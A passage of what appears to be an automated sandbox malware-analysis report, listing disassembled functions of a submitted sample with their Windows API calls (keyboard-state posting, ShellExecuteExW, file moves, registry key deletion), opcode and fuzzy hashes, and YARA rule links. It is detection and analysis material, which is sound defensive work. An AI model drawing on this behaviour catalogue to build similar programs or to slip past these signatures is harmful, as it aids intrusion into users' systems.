                                                • API String ID: 1211466189-0
                                                • Opcode ID: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
                                                • Instruction ID: c4b80d6eb5e17545930ffb41b06cecbf9e23071a9e43b2c93ac916de22735249
                                                • Opcode Fuzzy Hash: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
                                                • Instruction Fuzzy Hash: B7B16A75500219EBDF24DF68C9857BE7BB2BF04711F088069EE489F295DB38AD50CB60
                                                Function 00772A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 00772ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000,000000FF), ref: 00772B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 007AC39A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC347,00000004,00000000,00000000,00000000), ref: 007AC406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: f6c4655b0ad08d91074eac3e49be03358bbbe00181ee30481d05535ffd387c0f
                                                • Instruction ID: 793a803fbed04952f9f78e5264c2ea09096ac19289cd2329e89acb60a4896d54
                                                • Opcode Fuzzy Hash: f6c4655b0ad08d91074eac3e49be03358bbbe00181ee30481d05535ffd387c0f
                                                • Instruction Fuzzy Hash: E8411B30604780BACF368B28CC8DB7B7B91BF85350F5AC919E46F86562CA7D9843D711
                                                Function 007D716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7186
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D71BD
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D71D9
                                                • _memmove.LIBCMT ref: 007D7227
                                                • _memmove.LIBCMT ref: 007D7244
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D7253
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D7268
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7287
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: 6b5380d8619744a505c587cd03825b9cc47e418a13ac9f82b3e05c77d3dccd7a
                                                • Instruction ID: cdeb22756d23d5c7e0fd6ffc05d5035d3ebab2005bb4c3f6c598eae37d0ebe45
                                                • Opcode Fuzzy Hash: 6b5380d8619744a505c587cd03825b9cc47e418a13ac9f82b3e05c77d3dccd7a
                                                • Instruction Fuzzy Hash: 55319272900205EFCF14DF54DC89AAEB779FF45710F1481A5F904AB246DB34AE11CBA4
                                                Function 007F6205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007F621D
                                                • GetDC.USER32(00000000), ref: 007F6225
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6230
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007F623C
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F6278
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F6289
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F905C,?,?,000000FF,00000000,?,000000FF,?), ref: 007F62C3
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F62E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 063b5d5d37c0fe22be8c2566f29f120d9a0c2f3f6e7739e7743657e2194a3285
                                                • Instruction ID: 8395138c0f85038ecee36db42af43a696632ea374fb2fd1fed91c2b49685ab59
                                                • Opcode Fuzzy Hash: 063b5d5d37c0fe22be8c2566f29f120d9a0c2f3f6e7739e7743657e2194a3285
                                                • Instruction Fuzzy Hash: CF314F76201114BFEB114F54DC89FFA3BA9FF09761F044065FE08DA291CA799841CB68
                                                Function 007DEBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • _wcstok.LIBCMT ref: 007DED20
                                                • _wcscpy.LIBCMT ref: 007DEDAF
                                                • _memset.LIBCMT ref: 007DEDE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: b2b55f91324277dc972a288a5d2ecdb1e397f7c8627f198b5e18f57ee88c29d9
                                                • Instruction ID: 7bbcea0b625a37869729ca249c1ac93feeec270c3138ea5e1fc76ee2d663797b
                                                • Opcode Fuzzy Hash: b2b55f91324277dc972a288a5d2ecdb1e397f7c8627f198b5e18f57ee88c29d9
                                                • Instruction Fuzzy Hash: F8C15D71608300DFCB25EF24C885A5AB7F4BF84350F14892DF5999B3A2DB78E945CB92
                                                Function 00771424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d134b74e6ee0d46b2a5fb4f6f11a6444e8d3e8f3c2aa0be94eca7f8b20a85a78
                                                • Instruction ID: 1bd8b951238b2361730b4c530ba01707ffb397de9370a2319e8237bcc8121c46
                                                • Opcode Fuzzy Hash: d134b74e6ee0d46b2a5fb4f6f11a6444e8d3e8f3c2aa0be94eca7f8b20a85a78
                                                • Instruction Fuzzy Hash: 39715D30900149EFCF14CF98CC89ABEBB79FF86350F54C159F919AA251C738AA51CBA4
                                                Function 007E6C8C Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9a6ad606fbc078107d70e45293a73c55ef9e535643f16a6c747d71805de9a35
                                                • Instruction ID: fa3ea4f0b694beaa1aad7662559004a556a8c4241ed09b60478bdd3500f4846f
                                                • Opcode Fuzzy Hash: c9a6ad606fbc078107d70e45293a73c55ef9e535643f16a6c747d71805de9a35
                                                • Instruction Fuzzy Hash: 1F61C071504340EBCB10EB25CC89E6FB7E9EF98794F10891CF559972A2DB78AD00C792
                                                Function 007FB385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindow.USER32(01204888), ref: 007FB41F
                                                • IsWindowEnabled.USER32(01204888), ref: 007FB42B
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FB50F
                                                • SendMessageW.USER32(01204888,000000B0,?,?), ref: 007FB546
                                                • IsDlgButtonChecked.USER32(?,?), ref: 007FB583
                                                • GetWindowLongW.USER32(01204888,000000EC), ref: 007FB5A5
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FB5BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 4089623dce85043e0b4ad93677b6181dff964f9995a490e1ad3932fa45405014
                                                • Instruction ID: ef35434961d11cf071bdc1298f410a0df112dfdadcdc5032fc0b82d8ca9d5c5d
                                                • Opcode Fuzzy Hash: 4089623dce85043e0b4ad93677b6181dff964f9995a490e1ad3932fa45405014
                                                • Instruction Fuzzy Hash: F971DF34605248EFDB209FA4C994FBA7BB9FF49300F144069FA55973A2CB39AC54CB51
                                                Function 007EF532 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007EF55C
                                                • _memset.LIBCMT ref: 007EF625
                                                • ShellExecuteExW.SHELL32(?), ref: 007EF66A
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • GetProcessId.KERNEL32(00000000), ref: 007EF6E1
                                                • CloseHandle.KERNEL32(00000000), ref: 007EF710
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: d9d08d9ec380f263be062bcba6ea25ea24c18fb25418e31ef50095ade98e9549
                                                • Instruction ID: 53bd57d6b2464a97897ba7b80f108819f9084ea9025a7376050a94eba066b427
                                                • Opcode Fuzzy Hash: d9d08d9ec380f263be062bcba6ea25ea24c18fb25418e31ef50095ade98e9549
                                                • Instruction Fuzzy Hash: 2D619D75A01619DFCF14EF65C8849ADBBB5FF88310B148469E84AAB761DB38AD40CB90
                                                Function 007D127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 007D12BD
                                                • GetKeyboardState.USER32(?), ref: 007D12D2
                                                • SetKeyboardState.USER32(?), ref: 007D1333
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 007D1361
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 007D1380
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 007D13C6
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D13E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
                                                • Instruction ID: e9cc80bc46a305f5b91c4bdbfebef90659ac71b00135f55c46644cadf509a350
                                                • Opcode Fuzzy Hash: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
                                                • Instruction Fuzzy Hash: 7251E3A0A087D17EFB3646348C45BBA7EB96F06304F88858AE0D596AC2C6DDECD4D750
                                                Function 007D1097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(00000000), ref: 007D10D6
                                                • GetKeyboardState.USER32(?), ref: 007D10EB
                                                • SetKeyboardState.USER32(?), ref: 007D114C
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1178
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1195
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D11D9
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D11FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
                                                • Instruction ID: 145de9c7014661dc259ec0b5aa0cb37fbe0ca2444c4294784232a1d72f452719
                                                • Opcode Fuzzy Hash: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
                                                • Instruction Fuzzy Hash: 08512BA06447DA3DFB3283348C45B767FB96F06300F48858BE1D5466C2D69EEC94D750
                                                Function 007D56A4 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: 91662a139667cfeb7a3d039ea828d5f641f9ccaec4cd2af161e7e6a0d05d2a9f
                                                • Instruction ID: 706ca2e996731d715d649d64bdc9a645582ea7e0b18f9dd4ac8763621df9adfd
                                                • Opcode Fuzzy Hash: 91662a139667cfeb7a3d039ea828d5f641f9ccaec4cd2af161e7e6a0d05d2a9f
                                                • Instruction Fuzzy Hash: 954151A5D20514B6CF11FBB4AC8A9DF77BCAF05310F508466E518E3222E6389755C3A6
                                                Function 007D36B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D36DB,?), ref: 007D46CC
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D36DB,?), ref: 007D46E5
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D36FB
                                                • _wcscmp.LIBCMT ref: 007D3717
                                                • MoveFileW.KERNEL32(?,?), ref: 007D372F
                                                • _wcscat.LIBCMT ref: 007D3777
                                                • SHFileOperationW.SHELL32(?), ref: 007D37E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                • Opcode ID: 8d55a50ab4b3661881d6cc1b404c7ecae743acfeb03af99c8686c0d940ab90ed
                                                • Instruction ID: bd0b0fdb7e79d3b3ada441cafa35b415cced066ca05d11199fda7d29bd28f639
                                                • Opcode Fuzzy Hash: 8d55a50ab4b3661881d6cc1b404c7ecae743acfeb03af99c8686c0d940ab90ed
                                                • Instruction Fuzzy Hash: 63418FB2508345AACB51EB64D485ADBB7F8EF88350F04492FB49AC3251EA38D648C756
                                                Function 007F72C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007F72DC
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7383
                                                • IsMenu.USER32(?), ref: 007F739B
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F73E3
                                                • DrawMenuBar.USER32 ref: 007F73F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                • Opcode ID: 1d03d2dae026fc439153432cdbf0d91372c4a6a14696bf120d2359e1e3607c23
                                                • Instruction ID: ff7d7370568f72d4dc874040aab9415a98f4710cec9fd1c40353f8085873cf07
                                                • Opcode Fuzzy Hash: 1d03d2dae026fc439153432cdbf0d91372c4a6a14696bf120d2359e1e3607c23
                                                • Instruction Fuzzy Hash: 71411575A04249EFDB24DF54D884AAABBF9FF08315F048029EE1597360D734AD51DBA0
                                                Function 007F102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F105C
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F1086
                                                • FreeLibrary.KERNEL32(00000000), ref: 007F113D
                                                  • Part of subcall function 007F102D: RegCloseKey.ADVAPI32(?), ref: 007F10A3
                                                  • Part of subcall function 007F102D: FreeLibrary.KERNEL32(?), ref: 007F10F5
                                                  • Part of subcall function 007F102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F1118
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007F10E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: 305a0af7da02c2bf317d4a20d8ee7c28a22dffc39adcbd0bfe74cfbfe6ae9c14
                                                • Instruction ID: ad576fa49e1c4b38dcd1b3160bc48f9b4b8dbe2fd52b0ba6fac8855611a28ff5
                                                • Opcode Fuzzy Hash: 305a0af7da02c2bf317d4a20d8ee7c28a22dffc39adcbd0bfe74cfbfe6ae9c14
                                                • Instruction Fuzzy Hash: 023138B190110DFFDB149B90DC89AFEB7BCEF08310F4041A9E601A2241EA789E859BA4
                                                Function 007F62FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F631E
                                                • GetWindowLongW.USER32(01204888,000000F0), ref: 007F6351
                                                • GetWindowLongW.USER32(01204888,000000F0), ref: 007F6386
                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F63B8
                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F63E2
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F63F3
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
                                                • Instruction ID: 3a962ec47f52dd1f7eb5fdea946842aad3a6d5f0d77fe2b23fae92f003243555
                                                • Opcode Fuzzy Hash: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
